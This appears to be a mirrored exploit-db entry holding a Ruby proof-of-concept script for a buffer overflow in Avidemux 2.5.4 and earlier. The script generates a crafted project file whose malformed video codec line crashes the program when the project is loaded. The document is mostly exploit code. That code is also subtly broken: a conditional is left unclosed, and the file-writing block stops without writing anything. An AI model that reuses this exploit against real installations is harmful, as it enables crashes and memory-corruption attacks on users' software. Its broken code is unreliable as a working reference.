Avidemux 2.5.4 – Buffer Overflow

  • 作者: The_UnKn@wn
    日期: 2010-11-05
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/15428/
  • #!/usr/bin/env ruby
    # avidemux_crash.rb
    # Title		:	Avidemux <= 2.5.4 Buffer Overflow PoC
    # Date		:	31.10.2010
    # Version	: 	<= 2.5.4
    # Software Link	: 	http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/
    # Author	:	The_UnKn@wn
    # Email		: 	the_unknown [at] group51 [dot] org
    # Homepage	: 	http://group51.org
    # Tested on	:	openSUSE 11.3 and Windows XP SP3 English
    # Usage:
    # 	ruby avidemux_crash.rb <a *.mpg file>
    # 	Start Avidemux --> Load/Run Project --> crash!!
    # Note:
    # 	You can also use another video file format you would have to change the Format in Line and maybe some other stuff #54 too
    file = ARGV[0]
    if file.nil?
    	puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"
    name = "avidemux.prj"
    text = "//AD<- Needed to identify//\n" +
    "//--automatically built--\n"+
    "var app = new Avidemux();\n"+
    "//** Video **\n"+
    "// 01 videos source \n"+
    "//01 segments:\n"+
    "//** Postproc **\n"+
    "app.video.fps1000 = 25000;\n"+
    "//** Filters **\n"+
    "//** Video Codec conf **\n"+
    "app.video.codec(\"Copy\", \"CQ=4\", \"200 \"); \n"+ # <-- here is the vuln app.video.codec("Copy","CQ=4","0 ");
    "//** Audio **\n"+
    "//End of script"
    File.open(name, "w") do |f|
    puts "File #{name} has been created successfully"